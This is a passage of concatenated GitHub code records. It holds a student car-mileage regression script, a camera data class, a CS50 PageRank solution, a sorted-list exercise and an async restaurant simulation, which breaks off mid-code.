os.getcwd()\nprint(cwd)\nos.chdir(\"C:\\\\Users\\micha\\OneDrive - Dundalk Institute of Technology\\Year Three\\DataScience\\CA2\")\ncar_data= pd.read_csv(\"cleanedData.csv\")\n\n# =============================================================================\n#-----NOTE \n# Originally I had planned to do my predictions based off of the price of the car\n# However upon conducting my search it was prediciting an astounding 1% with a 9000k \n# mean error, so i updated it to instead predict the distance a car has travelled\n# =============================================================================\n\n#############################FUNCTIONS########################################\n#function for calculating the rsquare and rsqaure adjusted\n#takes in the x_train, y_train and model\n#created this function as i realised it was the same code repeated x number of times\ndef modelTraining(x_train, y_train, model):\n raw_sum_sq_errors = sum((y_train.mean() - y_train)**2)\n prediction_sum_sq_errors = sum((predictions_train - y_train)**2)\n rsquared1 = 1-prediction_sum_sq_errors/raw_sum_sq_errors\n \n N= 431 #len(y_train)\n p=1 \n rsquared_adj = 1 - (1-rsquared1)*(N-1)/(N-p-1)\n print(\"Rsquared Regression Model: \" +str(rsquared1))\n print(\"Rsquared Adjusted Regression Model: \" +str(rsquared_adj))\n\ndef meanAverageError(predictions_test, y_test):\n print(\"meanAverageError\")\n mae = sum(abs(predictions_test - y_test))/(len(y_test))\n #Prediction_test_MAE = sum(abs(predictions_test - y_test))/len(y_test)\n return mae\n\n#function that calculates the mean average percentage error by taking in the predicited test\n# and the y_test\ndef meanAveragePercentageError(predictions_test, y_test):\n 
print(\"meanAveragePercentageError\")\n    mape = np.mean(np.abs((y_test - predictions_test)/y_test))*100\n    #mape = np.mean(np.abs((predictions_test- y_test)/y_test))*100\n    return mape\n\ndef rmse(predictions_test, y_test):\n    print(\"rmse\")\n    rmse = (sum((predictions_test - y_test)**2)/len(y_test))**0.5\n    return rmse\n######################################################################################\n\n\n\n##########################Feature Engineering##################################\ncar_data.info()\ncar_data.head()\ncar_data.describe()\n\n# =============================================================================\n# #   Column     Non-Null Count  Dtype  \n# ---  ------     --------------  -----  \n#  0   Index     1929 non-null   int64 -- Numerical --- Predictor\n#  1   Name       1158 non-null   object -- Categorical --- Predictor\n#  2   Engine     1158 non-null   float64 -- Numerical --- Predictor\n#  3   Fuel Type  1158 non-null   object -- Categorical --- Predictor\n#  4   KM         1158 non-null   float64 -- Numerical --- Response\n#  5   Year       1158 non-null   float64 -- Numerical --- Predictor\n#  6   Price      1158 non-null   float64 -- Numerical --- Predictor\n#  7   Location   1158 non-null   object -- Categorical --- Predictor\n# =============================================================================\ncar_data.isnull().sum()\n\n\n#########Feature Engineering Step 2: Drop certain variables if not required\n\n# Drop Unnamed as unique values\nprint(len(car_data.Index.unique())) \ncar_data.drop('Index', axis = 1, inplace = True) \n\n#Dropped Name as it isn't relevant \ncar_data.drop('Name', axis=1, inplace =True)\n\n#########Feature Engineering Step 3: Construct New Variables if required\n#Change Fuel to numerical\ncar_data['Fuel']=np.where(car_data.FuelType ==\"Petrol\",1,0)\ncar_data.drop('FuelType', axis=1, inplace=True)\ncar_data['CarsFromDublin']=np.where(car_data.Location ==\"Dublin\",1,0)\ncar_data['CarsFromCork']=np.where(car_data.Location ==\"Cork\",1,0)\ncar_data['CarsFromWaterford']=np.where(car_data.Location ==\"Waterford\",1,0)\ncar_data.drop('Location', axis=1, inplace = True)\n\ncar_data.info()\n# =============================================================================\n# No Strong Correlation so no need for Multicollinearity\n# =============================================================================\n\n#Produce scatter and correlation plots\n#Shows there is no strong correlation between price and any other variables\ncorrVals = car_data.corr()\nprint(corrVals)\n\n#Plot of relationships between different car variables\nfigure(num=None, figsize=(8, 6), dpi=80, facecolor='w', edgecolor='k')\nsns.pairplot(car_data)\n\n#Heatmap to show the correlation between the variables\nfigure(num=None, figsize=(8, 6), dpi=80, facecolor='w', edgecolor='k')\nsns.heatmap(car_data.corr(), annot=True, cmap = 'Greens')\nplt.show()\n\n#Box plot for the newly added variables\n#Fuel Types and the distances they travelled\n#Shows that Diesel cars on average travelled more than petrol cars, with their IQR\n# ranging from 12-18000 whereas petrol cars are only 5-13000km travelled\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nsns.boxplot(car_data.Fuel, car_data.KM)\nplt.title(\"Comparing Petrol Vs Diesel\")\nplt.show()\n\n#CarLocation of the three most common places and the distances travelled\n#Shows cars outside Dublin have travelled longer distances than cars within Dublin,\n#not surprising considering how frequent public transport is \nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', 
edgecolor='k')\nsns.boxplot(car_data.CarsFromDublin, car_data.KM)\nplt.title(\"Comparing the Distance Travelled of Cars from Dublin vs Other\")\nplt.show()\n\n#Cars from Cork have an IQR of 4-18000km but also have a maxiumum distance of 18000km\n#whereas cars outside cork have a larger maximum distance of 30000km\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nsns.boxplot(car_data.CarsFromCork, car_data.KM)\nplt.title(\"Comparing the Distance Travelled of Cars from Cork vs Other\")\nplt.show()\n\n#Cars from Waterford are dwarfed in terms of distance travelled when compared to\n#cars outside of the county, they have a very small IQR ranging from 5-9000km with 9000km\n#being the max range as well\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nsns.boxplot(car_data.CarsFromWaterford, car_data.KM)\nplt.title(\"Comparing the Distance Travelled of Cars from Waterford vs Other\")\nplt.show()\n\ncar_data.info()\n###############REGRESSION MODELLING######################################\n#Step One: Split the Data\n#Split the data between predictor and regression\nx = car_data[['Engine', 'Price', 'Year', 'Fuel', 'CarsFromDublin', 'CarsFromCork', 'CarsFromWaterford']]\ny = car_data['KM'] \n\n#Splitting the Data Set into Training Data and Test Data\n#Splitting it 67/33 train test\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.333)\ny_train \nx_train \n\n#Step Two: Model Selection\n#Fit the variables in order of strongest correlation with KM and calculate adjusted R squared at each step.\n#NOTE: Orginally had this as price but updated to KM due to a better correlation\n#example the strongest correlation for price was cars from cork which had 0.036\n\n# =============================================================================\n# List of Correlation from Strongest to Weakest\n# Year ---- Strongest ----- -0.81\n# Fuel\n# Cars From Waterford\n# Engine\n# Cars From Dublin\n# Cars From Cork\n# Price ---- Weakest ----- 0.0031\n# =============================================================================\nfrom sklearn.linear_model import LinearRegression\nmodel1 = LinearRegression()\nmodel2 = LinearRegression()\nmodel3 = LinearRegression()\nmodel4 = LinearRegression()\nmodel5 = LinearRegression()\nmodel6 = LinearRegression()\nmodel7 = LinearRegression()\n\nprint(\"\")\n#########################Model1###############################\nprint(\"Model One: Year\")\n#Adding Year to the list\nmodel1.fit(x_train[['Year']], y_train)\n\n#the coef is used to describe indicate the relationship of the variable\n#A positive sign indicates that as the predictor variable increases, \n#the response variable decreases\n#A negative sign indicates that as the predictor variable increases,\n#the response variable decreases.\nprint(\"modelOne coef:\" , str(model1.coef_))\n#the expected mean value of Y when all X=0. 
\nprint(\"modelOne intercept\", str(model1.intercept_))\n#In order to predict the distance travelled you take the intercept value shown above\n# and add it to the coef times by the train value\n#The Year value is negative which means the newer car will have less distance travelled then\n#an older car\n#KM = -13711.97983325* Year + 27757644.55447659 \n\n\n\n#Generate predictions for the train data\npredictions_train = model1.predict(x_train[['Year']])\n\nmodels =[]\nmodels.append(modelTraining(x_train,y_train, model1))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.651396120409319 = 66%\n# Rsquared Adjusted Regression Model: 0.6505835239533967 =65%\n# =============================================================================\n#########################Model2###############################\nprint(\"Model Two: Year & Fuel\")\n#Adding Fuel to the model\nmodel2.fit(x_train[['Year', 'Fuel']], y_train)\nprint(model2.coef_)\nprint(model2.intercept_)\n#KM = 27757644.55447659*Year + -31460.50349713*Fuel + 25809303.114316154\n\npredictions_train = model2.predict(x_train[['Year','Fuel']])\n\nmodels2 =[]\nmodels2.append(modelTraining(x_train,y_train, model2))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.7057400497421817 = 71%\n# Rsquared Adjusted Regression Model: 0.7050541291122101 = 71%\n# =============================================================================\n#########################Model3###############################\nprint(\"Model Three: Year, Fuel & Cars from Waterford\")\n#Adding Cars From Waterford\nmodel3.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford']], y_train)\nprint(model3.coef_)\nprint(model3.intercept_)\n#KM = -12679.44625052*Year + -30912.6078414*Fuel + -3114.48760177*CarsFromWaterFord+ + 25809303.114316154\n\n\npredictions_train = model3.predict(x_train[['Year','Fuel', 'CarsFromWaterford']])\n\nmodels3 =[]\nmodels3.append(modelTraining(x_train,y_train, model3))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.7065682232368578 = 71%\n# Rsquared Adjusted Regression Model: 0.7058842330812327 = 71%\n# =============================================================================\n#########################Model4###############################\nprint(\"Model Four: Year, Fuel, CarsFromWaterford & Engine\")\n#Adding Engine\nmodel4.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford', 'Engine']], y_train)\nprint(model4.coef_)\nprint(model4.intercept_)\n#KM = -12615.67263087*Year + -47356.38403073*Fuel + -10005.13369497*CarsFromWaterFord+ -41033.06957118*Engine + 25622359.89234949\n\npredictions_train = model4.predict(x_train[['Year','Fuel', 'CarsFromWaterford', 'Engine']])\n\nmodels4 =[]\nmodels4.append(modelTraining(x_train,y_train, model4))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.7131489824132342 = 71%\n# Rsquared Adjusted Regression Model: 0.7124803320225891 = 71%\n# =============================================================================\n#########################Model5###############################\nprint(\"Model Five: Year, Fuel, CarsFromWaterford ,Engine & CarsFromDublin\")\n#Adding CarsFromDublin\nmodel5.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin']], y_train)\nprint(model5.coef_)\nprint(model5.intercept_)\n#KM = 
-12657.08675659*Year + -44161.59586249*Fuel + -6472.06942659*CarsFromWaterFord+ -34827.96554519*Engine + 10928.65236702*CarsFromDublin+ 25693263.138610736\n\npredictions_train = model5.predict(x_train[['Year','Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin']])\n \nmodels5 =[]\nmodels5.append(modelTraining(x_train,y_train, model5))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.7180111528492672 = 72%\n# Rsquared Adjusted Regression Model: 0.7173538361892422 = 72%\n# =============================================================================\n#########################Model6###############################\nprint(\"Model Six: Year, Fuel, CarsFromWaterford ,Engine, CarsFromDublin & CarsFromCork \")\n#Adding Cars From Cork\nmodel6.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin', 'CarsFromCork']], y_train)\nprint(model6.coef_)\nprint(model6.intercept_)\n#KM = -12600.67338118*Year + -45398.82843539*Fuel + -7390.22010528*CarsFromWaterFord+ -36350.50121446*Engine + 10022.66878778*CarsFromDublin + -4994.13462423*CarsFromCork+ 25582857.487180654\n\n\npredictions_train = model6.predict(x_train[['Year','Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin', 'CarsFromCork']])\n\nmodel6 =[]\nmodel6.append(modelTraining(x_train,y_train, model6))\nprint(\"\")\n# =============================================================================\n# Rsquared Regression Model: 0.718143997053015 = 72%\n# Rsquared Adjusted Regression Model: 0.7174869900531387 =72%\n# =============================================================================\n#########################Model7###############################\nprint(\"Model Seven: Year, Fuel, CarsFromWaterford ,Engine, CarsFromDublin ,CarsFromCork & Price\")\n\n#Adding Price\nmodel7.fit(x_train[['Year', 'Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin', 'CarsFromCork', 'Price']], y_train)\nprint(model7.coef_)\nprint(model7.intercept_)\n#KM = -1.26133024e+04*Year + -4.53991288e+04*Fuel + -7.07015723e+03*CarsFromWaterFord+ 3.62781210e+04*Engine + 1.00202064e+04*CarsFromDublin + -4.81874893e+03*CarsFromCork+ -9.28771300e-02*Price+ 25609662.63067534\n\npredictions_train = model7.predict(x_train[['Year','Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin', 'CarsFromCork', 'Price']])\nmodels =[]\nmodels.append(modelTraining(x_train,y_train, model7))\n\n#Displaying coefficients by placing them in a DataFrame.\noutput = pd.DataFrame(model7.coef_, ['Year COEFF', 'Fuel COEFF', 'CarsFromWaterford COEFF', 'Engine COEFF', 'CarsFromDublin COEFF', 'CarsFromCork COEFF', 'Price COEFF'], columns = ['Coeff'])\nprint(output) \n# =============================================================================\n# Rsquared Regression Model: 0.7182429375528141 = 72%\n# Rsquared Adjusted Regression Model: 0.7175861611834733 = 72%\n# =============================================================================\n#Coeff for the final model\n# =============================================================================\n# Coeff\n# Year COEFF -12958.666908 ---- As the Year(when a car is made)Increases the KM decreases\n# Fuel COEFF -41601.173508 ---- Not sure how to desribe this one\n# CarsFromWaterford COEFF -5537.422575 ---- The more cars from Waterford KM descreases \n# Engine COEFF -29953.244097 ---- As the Engine size icreases the KM decreases\n# CarsFromDublin COEFF 12538.069636 ---- The more cars from Dublin KM increases\n# CarsFromCork COEFF 2508.440712 ---- The more 
cars from Cork KM increases\n# Price COEFF 0.223042 ---- Does not have an effect as its near 0?\n# =============================================================================\n# Interesting to plot the errors for the actual values\nplt.scatter(y_train, predictions_train)\np1 = max(max(predictions_train), max(y_train))\np2 = min(min(predictions_train), min(y_train))\nplt.plot([p1, p2], [p1, p2], 'b-')\nplt.show() # Should be close to a straight line\n\nplt.scatter(y_train, predictions_train - y_train)\nplt.show()\n\n\n#Step 3: Model Evaluation Based on TEST set.\n#Based of the results of the previous Step, I will be using model7 as model5, model6 and \n#model7 had an adjusted Rsquare of 72%\n\n#MAE - Mean Absolute Error\n#MAPE - Mean Absolute Percentage Error\n#RMSE - Root Mean Square Error\n\n\n\n### For some reason the results of the MAPE & RMSE are incorrect,\n### I have tried googling solutions for this as well as reviewing previous \n### Class examples and I am unable to see a solution for this\n\npredictions_test = model5.predict(x_test[['Year','Fuel', 'CarsFromWaterford', 'Engine', 'CarsFromDublin']])\nprint(len(y_test))\n# =============================================================================\n\n\nprint(meanAverageError(predictions_test, y_test))\nprint(meanAveragePercentageError(predictions_test, y_test))\n#print(rmse(predictions_test, y_test))\n# =============================================================================\n\n\n\n\n\n# =============================================================================\n###Plot prediction results\n#First plot the y test values and the predictions for the model\n#This SHOULD BE close to a straight line\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nplt.scatter(y_test, predictions_test)\np1 = max(max(predictions_test), max(y_test))\np2 = min(min(predictions_test), min(y_test))\nplt.plot([p1, p2], [p1, p2], 'b-')\nplt.title(\"Predictions v Actual Test Values\")\nplt.xlabel(\"Actual values\")\nplt.ylabel(\"Predicted Values\")\nplt.show() \n#Looking at this graph you can see that some of the points sit on the fitted line\n#with many of these plots sitting just under or slightly over suggesting the predicted\n#values are nearly accurate to the actual values and in some cases spot on\n\nfigure(num=None, figsize=(8, 8), dpi=80, facecolor='w', edgecolor='k')\nplt.scatter(y_test, predictions_test - y_test)\nplt.title(\"Errors v Actual Test Values\")\nplt.xlabel(\"Actual values\")\nplt.ylabel(\"Error Values\")\nplt.show()\n#This Graph shows that there is no real pattern between Error Values and Actual Values\n#with many of them being scattered throughout this graph, However it seems that the\n#larger KM distance then the error value predicted was less then the actual value \n#and many of the smaller KM distance error values were over the actual value \n# =============================================================================\n\n","repo_name":"Flynnn99/DataScienceCA2","sub_path":"modelling.py","file_name":"modelling.py","file_ext":"py","file_size_in_byte":18270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36164820091","text":"from core.vector3 import Vec3f\nfrom core.point3 import Point3f\n\n\nclass CameraData(object):\n\n \"\"\"\n Camera Data\n Holds information about the camera data\n Will be used by the renderer interface to initialise the camera for the 3D scene viewer\n \"\"\"\n\n def __init__(self):\n self._near_clip = 5\n self._far_clip 
= 15\n self._focus_dist = 10\n self._fov = 45\n self._up = Vec3f(0, 0, 1)\n self._direction = Vec3f(1, 0, 0)\n self._origin = Point3f(0, 0, 0)\n\n def deserialize(self, stream):\n \"\"\"\n Deserializes all camera information from the socket stream\n :param stream: SocketStream\n :return:\n \"\"\"\n self._near_clip = stream.read_float()\n self._far_clip = stream.read_float()\n self._focus_dist = stream.read_float()\n self._fov = stream.read_float()\n self._up = stream.read_vec3f()\n self._direction = stream.read_vec3f()\n self._origin = stream.read_point3f()\n\n @property\n def near_clip(self):\n \"\"\"\n Returns the camera near clip value\n :return:\n \"\"\"\n return self._near_clip\n\n @property\n def far_clip(self):\n \"\"\"\n Returns the camera far clip value\n :return:\n \"\"\"\n return self._far_clip\n\n @property\n def focus_dist(self):\n \"\"\"\n Returns the camera focus distance\n :return:\n \"\"\"\n return self._focus_dist\n\n @property\n def fov(self):\n \"\"\"\n Returns the camera the field of view angle\n :return:\n \"\"\"\n return self._fov\n\n @property\n def up(self):\n \"\"\"\n Returns the camera up vector\n :return:\n \"\"\"\n return self._up\n\n @property\n def direction(self):\n \"\"\"\n Returns the camera viewing direction\n :return:\n \"\"\"\n return self._direction\n\n @property\n def origin(self):\n \"\"\"\n Returns the camera 3D origin world point\n :return:\n \"\"\"\n return self._origin\n\n def to_string(self):\n \"\"\"\n Returns all camera information within a string\n :return:\n \"\"\"\n return 'neaClip = {} \\n' \\\n 'farClip = {} \\n' \\\n 'focusDist = {} \\n' \\\n 'fov = {} \\n' \\\n 'up = {} \\n' \\\n 'direction = {} \\n' \\\n 'origin = {} \\n'.format(self._near_clip,\n self._far_clip,\n self._focus_dist,\n self._fov,\n self._up.to_string(),\n self._direction.to_string(),\n self._origin.to_string())\n\n\n","repo_name":"ckreisl/emca","sub_path":"model/camera_data.py","file_name":"camera_data.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24448622018","text":"import os\nimport random\nimport re\nimport sys\n\nDAMPING = 0.85\nSAMPLES = 10000\n\n\ndef main():\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python pagerank.py corpus\")\n corpus = crawl(sys.argv[1])\n ranks = sample_pagerank(corpus, DAMPING, SAMPLES)\n print(f\"PageRank Results from Sampling (n = {SAMPLES})\")\n for page in sorted(ranks):\n print(f\" {page}: {ranks[page]:.4f}\")\n ranks = iterate_pagerank(corpus, DAMPING)\n print(f\"PageRank Results from Iteration\")\n for page in sorted(ranks):\n print(f\" {page}: {ranks[page]:.4f}\")\n\n\ndef crawl(directory):\n \"\"\"\n Parse a directory of HTML pages and check for links to other pages.\n Return a dictionary where each key is a page, and values are\n a list of all other pages in the corpus that are linked to by the page.\n \"\"\"\n pages = dict()\n\n # Extract all links from HTML files\n for filename in os.listdir(directory):\n if not filename.endswith(\".html\"):\n continue\n with open(os.path.join(directory, filename)) as f:\n contents = f.read()\n links = re.findall(r\"<a\\s+(?:[^>]*?)href=\\\"([^\\\"]*)\\\"\", contents)\n pages[filename] = set(links) - {filename}\n\n # Only include links to other pages in the corpus\n for filename in pages:\n pages[filename] = set(\n link for link in pages[filename]\n if link in pages\n )\n\n return pages\n\n\ndef transition_model(corpus, page, damping_factor):\n \"\"\"\n Return a probability 
distribution over which page to visit next,\n given a current page.\n\n With probability `damping_factor`, choose a link at random\n linked to by `page`. With probability `1 - damping_factor`, choose\n a link at random chosen from all pages in the corpus.\n \"\"\"\n random = 1 - damping_factor\n result = {}\n \n pages = 0\n for items in corpus:\n pages += 1\n \n links = 0\n for item in corpus[page]:\n links += 1 \n \n for item in corpus:\n result[item] = (random / pages)\n \n if item in corpus[page]:\n result[item] += (damping_factor / links)\n \n return result\n \n\ndef sample_pagerank(corpus, damping_factor, n):\n \"\"\"\n Return PageRank values for each page by sampling `n` pages\n according to transition model, starting with a page at random.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). All\n PageRank values should sum to 1.\n \"\"\"\n result = {}\n helper = []\n for item in corpus:\n result[item] = 0\n helper.append(item) \n \n pages = 0\n for items in corpus:\n pages += 1\n \n first = random.randint(0, (pages-1))\n \n result[helper[first]] = 1\n \n current_page = helper[first]\n \n for i in range(n-1):\n \n distribution = transition_model(corpus, current_page, damping_factor)\n \n sites = []\n weights = []\n \n for item in distribution:\n sites.append(item)\n weights.append(distribution[item])\n \n Next = random.choices(sites, weights=weights, k=1)\n \n result[Next[0]] += 1\n current_page = Next[0]\n\n for item in result:\n result[item] = result[item] / n \n \n return result \n \n\ndef iterate_pagerank(corpus, damping_factor):\n \"\"\"\n Return PageRank values for each page by iteratively updating\n PageRank values until convergence.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). All\n PageRank values should sum to 1.\n \"\"\"\n #print('corpus: ', corpus)\n total_pages = 0\n numlinks = {}\n incoming_pages = {}\n for item in corpus:\n total_pages += 1\n numlinks[item] = 0\n incoming_pages[item] = set()\n \n result = {}\n for item in corpus:\n result[item] = 1/total_pages\n \n for item in corpus:\n for item2 in corpus:\n if item in corpus[item2]:\n incoming_pages[item].add(item2)\n \n for item in corpus:\n for page in corpus[item]:\n numlinks[item] += 1\n \n # print(\"result \", result)\n # print(\"numlinks \", numlinks)\n # print(\"incoming_pages \", incoming_pages)\n \n count = 0\n while count != total_pages:\n count = 0\n for item in result:\n copy_result = result[item]\n\n second_condition = 0 \n for page in incoming_pages[item]:\n second_condition += (result[page]/numlinks[page])\n \n result[item] = ((1 - damping_factor)/total_pages) + (damping_factor * second_condition)\n \n if -0.001 < (copy_result-result[item]) < 0.001:\n count += 1\n \n sum_result = 0\n for item in result:\n sum_result += result[item]\n \n for item in result:\n result[item] = result[item] / sum_result\n \n return result\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"freeklinssen/cs50AI","sub_path":"week_2/pagerank/pagerank.py","file_name":"pagerank.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74209065288","text":"\"\"\"\r\nA list is sorted in ascending order if it is empty or each item except the last one is less than or \r\nequal to its successor. 
Define a predicate isSorted that expects a list as an argument and returns \r\nTrue if the list is sorted, or returns False otherwise. (Hint: For a list of length 2 or greater, loop \r\nthrough the list and compare pairs of items, from left to right, and return False if the first item in \r\na pair is greater.)\r\n\"\"\"\r\ndef issorted(li,n):\r\n if n == 0:\r\n return True\r\n for i in range(n-1):\r\n if(li[i]>li[i+1]):\r\n return False\r\n return True\r\n\r\nli=[]\r\nn = int(input(\"Enter number of elements : \"))\r\nli = list(map(int,input(\"\\nEnter the numbers : \").strip().split()))[:n]\r\nprint(issorted(li,n))\r\n","repo_name":"Krishan00007/Python_practicals","sub_path":"practical_5(3).py","file_name":"practical_5(3).py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"75056291848","text":"from collections import deque\nimport asyncio\n\nclass Hostess:\n def __init__(self, restaurant):\n self.restaurant = restaurant\n self.log = self.restaurant.log\n\n self.waiting_list = {\n 'dinner': set(), 'dessert': set(), \n 'both': set(), 'none': set(),\n 'customers': {}, 'queue': deque() \n }\n self.tables = {}\n self.busy = False\n self.line_is_empty = True\n self.status = 'line_is_empty'\n\n self.db_customers = self.restaurant.db.tables['customers']\n\n def __repr__(self):\n return f\"## hostess ## restaurant_id {self.restaurant.id} - busy: {self.busy} - tables: {self.tables} - waiting_list: {self.waiting_list}\" \n def __str__(self):\n return repr(self)\n\n @classmethod\n async def create(cls, restaurant):\n return cls(restaurant)\n\n async def organize_tables(self):\n try:\n available_tables = await self.restaurant.get_available_tables()\n table_count = len(available_tables)\n label_tables = (t for t in available_tables)\n reserve_count = int(table_count * .25)\n for table_type in {'both', 'dinner', 'dessert', 'open'}:\n self.tables[table_type] = {}\n for _ in range(reserve_count):\n t_id = next(label_tables)\n self.tables[table_type][t_id] = 4\n self.tables[t_id] = table_type\n for t_id in label_tables:\n self.tables['open'][t_id] = 4\n self.tables[t_id] = 'open'\n except Exception as e:\n self.log.exception(f\"{self} error in organizing tables\")\n async def assign_customer_table(self, customer_id, table_id):\n \"\"\"\n used by hostess to direct customer to table\n \"\"\"\n if customer_id in self.waiting_list['customers']:\n # update db\n await self.db_customers.update(\n table_id=table_id,\n where={\n 'id': customer_id\n }\n )\n\n # send please_sit \n await self.restaurant.events_for_client.put(\n {\n \"name\": \"please_sit\",\n \"payload\": {\n \"customer_id\": customer_id,\n \"table_id\": table_id\n }\n }\n )\n async def run_capcacity_control(self):\n \"\"\"\n run to reduce capacity by 25 % so restaurant stays open\n \"\"\"\n # remove all customers which will order nothing, and any sit_together customers\n\n # remove members from end of end of line( waiting the least amount of time ) \n\n try:\n capacity = self.restaurant.line.line_number\n number_to_remove = int(capacity * .25)\n self.log.warning(f\"{self} capacity control started to remove {number_to_remove} customers\")\n queue = self.waiting_list['queue'].copy()\n for _ in range(number_to_remove):\n if len(self.waiting_list['none']) > 0:\n for customer in self.waiting_list['none']:\n await self.remove_customer_from_line(customer)\n number_to_remove-=1\n queue = self.waiting_list['queue'].copy()\n if number_to_remove == 0:\n 
break\n try:\n customer = queue.pop()\n await self.remove_customer_from_line(customer)\n except IndexError:\n break\n\n self.log.warning(f\"{self} capacity control completed\")\n except Exception as e:\n self.log.warning(f\"{self} error during capacity control\")\n\n async def remove_customer_from_line(self, customer):\n self.log.warning(f\"{self} remove_customer_from_line - customer_id: {customer}\")\n if customer in self.waiting_list['customers']:\n m_choice = self.waiting_list['customers'][customer]['meal_choice']\n self.waiting_list[m_choice].discard(customer)\n del self.waiting_list['customers'][customer]\n if customer in self.waiting_list['queue']:\n self.waiting_list['queue'].remove(customer)\n\n await self.restaurant.events_for_client.put(\n {\n \"name\": \"please_leave\",\n \"payload\": {\n \"customer_id\": customer\n }\n }\n )\n\n async def start_service(self):\n try:\n await self.organize_tables()\n while True:\n if len(self.waiting_list['customers']) == 0:\n work = await self.restaurant.work_for_hostess.get()\n else:\n try:\n work = self.restaurant.work_for_hostess.get_nowait()\n except asyncio.queues.QueueEmpty:\n work = {'event': 'queue_empty'}\n\n self.log.warning(f\"{self} - work {work}\")\n if work['event'] == 'game_over':\n break\n # events\n if self.tables:\n available_tables = await self.restaurant.get_available_tables()\n # update current availability count\n for t_id in available_tables:\n self.tables[self.tables[t_id]][t_id] = 4 - available_tables[t_id]['total']\n\n #request_table\n if work['event'] == 'request_table':\n customer = work['customer']\n meal_choice = 'none'\n if customer['will_have_dinner'] and customer['will_have_dessert']:\n meal_choice = 'both'\n elif customer['will_have_dinner']:\n meal_choice = 'dinner'\n elif customer['will_have_dessert']:\n meal_choice = 'dessert'\n else: \n pass\n self.waiting_list[meal_choice].add(customer['id'])\n self.waiting_list['customers'][customer['id']] = {\n 'sit_together': customer['sit_together']['sit_together'],\n 'meal_choice': meal_choice\n }\n self.waiting_list['queue'].append(customer['id'])\n\n self.log.warning(f\"{self} - {work}\")\n\n # line_near_capacity\n if work['event'] == 'line_near_capacity':\n self.busy = True\n self.restaurant.waiter.busy = True\n\n # trigger line control logic\n if not self.status == 'line_near_capacity':\n await self.run_capcacity_control()\n\n # line_half_capacity\n if work['event'] == 'line_half_capacity':\n self.busy = True\n self.restaurant.waiter.busy = True\n if not self.status == 'line_half_capacity':\n self.status = 'line_half_capacity'\n await self.run_capcacity_control()\n # line_partial_capacity\n if work['event'] == 'line_partial_capacity' or work['event'] == 'line_is_empty':\n self.busy = False\n self.restaurant.waiter.busy = False\n if not self.status == work['event']:\n self.status = work['event']\n\n unassigned = deque()\n while True:\n # use assign_customer_table\n assigned = False\n try:\n customer_id = self.waiting_list['queue'].popleft()\n except IndexError:\n self.waiting_list['queue'] = unassigned\n break\n if not customer_id in self.waiting_list['customers']:\n continue\n pref = self.waiting_list['customers'][customer_id]\n table_type = None\n if 'sit_together' in pref and len(pref['sit_together']) > 0:\n # check that all customers are on waiting list, else append to end of line\n missing_from_group = [c in self.waiting_list['customers'] for c in pref['sit_together']]\n if False in missing_from_group:\n unassigned.append(customer_id)\n continue\n seats = 
len(pref['sit_together']) + 1\n group_choices = {self.waiting_list['customers'][c]['meal_choice'] for c in pref['sit_together']}\n group_choices.add(pref['meal_choice'])\n\n if 'both' in group_choices:\n table_type = 'both'\n elif 'dinner' in group_choices:\n if 'dessert' in group_choices:\n table_type = 'both'\n else:\n table_type = 'dinner'\n else:\n table_type == 'dessert'\n \n \n group_ids = [customer_id, *pref['sit_together']]\n\n if 'none' in group_choices or table_type is None:\n # refuse service - everyone must order something\n for c_id in group_ids:\n await self.remove_customer_from_line(c_id)\n continue\n\n for t_type in {table_type, 'open'}:\n for t_id in self.tables[t_type]:\n if not t_id in available_tables:\n continue\n if self.tables[t_type][t_id] >= seats:\n # assign group to table\n for c_id in group_ids:\n await self.assign_customer_table(\n c_id, t_id\n )\n self.tables[t_type][t_id] -=seats\n assigned = True\n break\n if assigned:\n # remove group ids from wating list\n for c_id in group_ids:\n m_choice = self.waiting_list['customers'][c_id]['meal_choice']\n self.waiting_list[m_choice].discard(c_id)\n del self.waiting_list['customers'][c_id]\n if c_id in self.waiting_list['queue']:\n self.waiting_list['queue'].remove(c_id)\n break\n if not assigned:\n unassigned.append(customer_id)\n \n \"\"\"\n Non-Groups\n prefer meal_choice type tables\n\n Only allow open table usage when not busy\n for dessert only customers\n \"\"\"\n self.log.warning(f\"{self} non-group ## cid {customer_id} pref {pref}\")\n if pref['meal_choice'] == 'none':\n await self.remove_customer_from_line(customer_id)\n continue\n if self.busy and pref['meal_choice'] == 'dessert':\n table_options = {pref['meal_choice']}\n else:\n table_options = {pref['meal_choice'], 'open'}\n for t_type in table_options:\n if not t_type in self.tables:\n continue\n if assigned:\n break\n for t_id in self.tables[t_type]:\n if t_id in available_tables and self.tables[t_type][t_id] >= 1:\n await 